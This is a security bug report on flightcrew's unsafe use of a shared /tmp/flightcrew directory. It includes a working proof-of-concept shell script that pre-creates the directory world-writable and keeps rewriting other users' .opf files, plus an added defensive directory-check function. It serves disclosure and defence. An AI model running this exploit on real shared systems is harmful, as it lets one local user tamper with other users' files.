Package: flightcrew
Version: 0.7.2+dfsg-8
Tags: security
flightcrew creates temporary files in /tmp/flightcrew/, even when this
directory belongs to another user. A malicious user could exploit this to tamper
with other users' temporary files; probably also to overwrite arbitrary files
via a symlink attack.
I've attached a proof-of-concept exploit. When it is running, all users will be
getting spurious validation errors:
$ whoami
jwilk
$ ls -ld /tmp/flightcrew/
drwxrwxrwx+ 3 mallory mallory 60 May 6 22:58 /tmp/flightcrew/
$ flightcrew-cli EpubValidates_Valid.epub
EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's
"version" attribute value needs to be "2.0", but is "
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
".
--
Jakub Wilk
#!/bin/sh
set -e -u
mkdir -m 777 /tmp/flightcrew
cd /tmp/flightcrew
setfacl -d -m "u:$USER:rwx" .
msg='
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
'
msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\</g' -e 's/$/\\\ /' | tr -d '\n')
while true
do
find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e "s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true
done
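As an added defensive counterpart to the report (example code, not from the bug report or from the flightcrew project): a POSIX shell function that only uses a scratch directory it can prove is safe. It creates the directory with mode 0700 when absent, and otherwise refuses a path that is a symlink, is not owned by the calling user, or carries any group/other write bit, which is exactly the state the proof of concept above sets up. It assumes GNU stat(1) for the `-c` format; the directory name `flightcrew-<uid>` in the comment is a constructed example, not a path flightcrew actually uses.

```shell
#!/bin/sh
# Added example, not part of the bug report or of flightcrew.
# Assumes GNU coreutils stat(1) (the -c format is a GNU extension).

# safe_scratch_dir DIR
# Prints DIR and returns 0 only if DIR is a real directory (not a symlink),
# owned by the calling user and not writable by group or others.
# If DIR does not exist it is created with mode 0700 in one mkdir call, so
# there is no window in which the directory exists with a looser mode.
safe_scratch_dir() {
    dir=$1

    if [ ! -e "$dir" ] && [ ! -L "$dir" ]; then
        # mkdir fails with EEXIST if someone races us; that failure is reported,
        # not silently tolerated.
        mkdir -m 700 "$dir" || return 1
    fi

    # A symlink at this path is the attack vector: never follow it.
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        return 1
    fi

    owner=$(stat -c '%u' "$dir") || return 1
    mode=$(stat -c '%a' "$dir") || return 1

    # The directory must belong to us, not to "mallory".
    [ "$owner" = "$(id -u)" ] || return 1

    # Reject any write bit for group (second-to-last octal digit) or
    # others (last octal digit); 777, 770, 1777 etc. all fail here.
    case $mode in
        *[2367]?|*[2367]) return 1 ;;
    esac

    printf '%s\n' "$dir"
}

# Intended use (constructed name): a per-user directory so users never
# compete for one shared, predictable path like /tmp/flightcrew:
#   safe_scratch_dir "${TMPDIR:-/tmp}/flightcrew-$(id -u)" || exit 1
```

The check is deliberately stricter than "owned by me": a directory the user owns but has left group- or world-writable is still rejected, because another local user could then plant or replace the `.opf` files the tool validates.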